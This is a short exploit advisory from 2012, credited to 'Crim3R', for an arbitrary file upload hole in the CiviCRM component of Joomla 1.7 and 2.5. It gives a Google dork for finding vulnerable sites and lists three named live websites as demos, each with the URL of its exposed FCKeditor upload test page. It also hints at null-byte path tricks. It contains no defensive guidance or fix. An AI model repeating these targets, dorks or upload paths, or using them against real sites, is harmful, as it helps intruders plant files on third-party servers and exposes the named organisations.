# Exploit Title: joomla 1.7 & 2.5 (com_civicrm) Arbitrary File Upload 
Vulnerability

# Google Dork: inurl:/components/com_civicrm/

# Date: 08/22/2012

# Author: Crim3R

# download Link : http://sourceforge.net/projects/civicrm/files/civicrm-stable/

# Tested on: all

==================================
  
D3m0:
http://artistic-webdesign.com/lynda/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/uploadtest.html


http://pflagillinois.org/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/test.html


http://madacenter.com/mada/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/test.html


===============Crim3R@Att.Net=========

$Home = %00

thanks to :  2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir